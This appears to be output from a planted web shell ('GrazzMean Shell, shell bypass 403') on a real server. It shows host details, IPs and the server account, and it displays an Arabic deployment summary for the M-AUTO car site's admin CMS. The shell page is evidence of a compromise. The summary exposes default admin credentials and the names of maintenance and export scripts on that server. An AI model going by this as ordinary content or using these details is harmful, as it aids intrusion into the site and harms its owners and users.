shell bypass 403

GrazzMean Shell

: /var/www/vhosts/m-auto.co/httpdocs/ [ drwxr-x--- ]
Uname: Linux serv.m-auto.co 3.10.0-1160.42.2.el7.x86_64 #1 SMP Tue Sep 7 14:49:57 UTC 2021 x86_64
Software: nginx/1.28.2
PHP version: 8.1.34 [ PHP INFO ] PHP os: Linux
Server Ip: 41.215.243.19
Your Ip: 216.73.216.151
User: m-auto.co_vxasg6smqe (10000) | Group: psacln (1003)
Safe Mode: OFF
Disable Function:
opcache_get_status,mail

name : PRODUCTION_SUMMARY.md
# ملخص تجهيز مشروع M-AUTO للإنتاج

## ✅ ما تم إنجازه

### 1. إعداد البيئة المتعددة
- ✅ إنشاء ملف `includes/config.php` للإعدادات المتعددة البيئات
- ✅ إنشاء ملف `includes/db_production.php` لاتصال قاعدة البيانات المحسن
- ✅ تحديث `admin/includes/header.php` لاستخدام الإعدادات الجديدة

### 2. إضافة الصلاحيات المفقودة
- ✅ إضافة صلاحية `bookings_add` - Add Bookings
- ✅ إضافة صلاحية `bookings_edit` - Edit Bookings  
- ✅ إضافة صلاحية `settings_add` - Add Settings
- ✅ منح جميع الصلاحيات للمدير الرئيسي (ID=1)

### 3. ملفات الأمان والحماية
- ✅ إنشاء ملف `.htaccess` شامل مع:
  - حماية الملفات الحساسة
  - ضغط Gzip
  - تخزين مؤقت للمتصفح
  - رؤوس الأمان
  - إعادة توجيه HTTPS
- ✅ إنشاء صفحات أخطاء مخصصة (404.php, 500.php)
- ✅ إنشاء ملف `robots.txt` لمحركات البحث

### 4. أدوات النقل والصيانة
- ✅ سكريپت تصدير قاعدة البيانات (`export_database.php`)
- ✅ سكريپت فحص متطلبات الخادم (`server_check.php`)
- ✅ سكريپت تحديث الروابط للإنتاج (`update_urls.php`)
- ✅ قائمة فحص النقل (`deployment_checklist.php`)
- ✅ سكريپت التنظيف النهائي (`cleanup_for_production.php`)

### 5. تحسين SEO والأداء
- ✅ إنشاء ملف `sitemap.xml` أساسي
- ✅ تفعيل ضغط Gzip
- ✅ إعداد التخزين المؤقت للمتصفح
- ✅ رؤوس الأمان HTTP

### 6. التوثيق الشامل
- ✅ دليل النقل المفصل (`DEPLOYMENT_GUIDE.md`)
- ✅ ملف README شامل (`README.md`)
- ✅ هذا الملخص (`PRODUCTION_SUMMARY.md`)

## 📊 حالة قاعدة البيانات

### الصلاحيات الحالية (37 صلاحية):
- **Users:** view, add, edit, delete
- **Cars:** view, add, edit, delete
- **Brands:** view, add, edit, delete
- **Categories:** view, add, edit, delete
- **Branches:** view, add, edit, delete
- **Bookings:** view, add, edit, delete ✅ (تم إضافة add & edit)
- **Offers:** view, add, edit, delete
- **Slider:** view, add, edit, delete
- **Videos:** view, add, edit, delete
- **Settings:** view, edit, add ✅ (تم إضافة add)
- **About Page:** edit

### قاعدة البيانات:
- ✅ تم تصدير قاعدة البيانات (26.87 KB)
- ✅ جميع الجداول موجودة ومكتملة
- ✅ المدير الرئيسي (ID=1) لديه جميع الصلاحيات
- ✅ ترميز utf8mb4 للدعم العربي الكامل

## 🚀 خطوات النقل للإنتاج

### 1. تحضير الخادم
```bash
# تأكد من متطلبات PHP
php -v  # PHP 7.4+
php -m  # تحقق من الإضافات المطلوبة
```

### 2. إعداد قاعدة البيانات في cPanel
1. إنشاء قاعدة بيانات جديدة
2. إنشاء مستخدم قاعدة بيانات
3. ربط المستخدم بقاعدة البيانات
4. استيراد ملف `database_backup_2025-10-18_14-17-57.sql`

### 3. رفع الملفات
1. ضغط مجلد المشروع (استثناء ملفات التطوير)
2. رفع إلى public_html عبر File Manager
3. استخراج الملفات

### 4. تحديث الإعدادات
```php
// في includes/config.php
define('DB_HOST', 'localhost');
define('DB_USERNAME', 'your_cpanel_db_username');
define('DB_PASSWORD', 'your_cpanel_db_password');
define('DB_NAME', 'your_cpanel_db_name');
```

### 5. تفعيل SSL وHTTPS
1. تثبيت شهادة SSL في cPanel
2. إلغاء التعليق عن إعادة توجيه HTTPS في .htaccess

### 6. اختبار النظام
- تشغيل `server_check.php`
- تسجيل دخول الإدارة
- اختبار جميع الوظائف
- تشغيل `update_urls.php` لتحديث الروابط

### 7. التنظيف النهائي
- تشغيل `cleanup_for_production.php`
- حذف ملفات التطوير المتبقية

## 🔧 إعدادات مهمة للإنتاج

### في cPanel:
- **PHP Version:** 7.4 أو أحدث
- **Memory Limit:** 256M
- **Upload Max Filesize:** 10M
- **Post Max Size:** 10M
- **Max Execution Time:** 300

### SSL Certificate:
- تفعيل Let's Encrypt أو رفع شهادة مخصصة
- تفعيل Force HTTPS Redirect

### النسخ الاحتياطي:
- إعداد نسخ احتياطي يومي لقاعدة البيانات
- نسخ احتياطي أسبوعي للملفات

## 📞 معلومات الدعم

### بيانات الدخول الافتراضية:
- **اسم المستخدم:** admin
- **كلمة المرور:** admin123
- ⚠️ **يجب تغييرها فور الدخول الأول!**

### الملفات المهمة:
- `includes/config.php` - إعدادات النظام
- `includes/permissions.php` - نظام الصلاحيات
- `.htaccess` - إعدادات Apache
- `admin/includes/header.php` - رأس لوحة التحكم

## ✅ قائمة فحص نهائية

- [ ] تحديث بيانات قاعدة البيانات في config.php
- [ ] رفع الملفات إلى الخادم
- [ ] استيراد قاعدة البيانات
- [ ] تثبيت SSL Certificate
- [ ] تفعيل HTTPS Redirect
- [ ] اختبار جميع الوظائف
- [ ] تشغيل update_urls.php
- [ ] تشغيل cleanup_for_production.php
- [ ] تحديث DNS للدومين m-auto.co
- [ ] اختبار الموقع من أجهزة مختلفة

## 🎯 النتيجة النهائية

المشروع جاهز بالكامل للنقل إلى الإنتاج مع:
- ✅ نظام صلاحيات كامل ومرن
- ✅ حماية أمنية شاملة
- ✅ تحسين للأداء والسرعة
- ✅ دعم كامل للغة العربية
- ✅ واجهة إدارة متقدمة
- ✅ نظام إدارة محتوى شامل

**الموقع سيكون متاحاً على:** https://m-auto.co

---
**تاريخ التجهيز:** 18 أكتوبر 2025  
**الحالة:** جاهز للنقل 🚀
© 2026 GrazzMean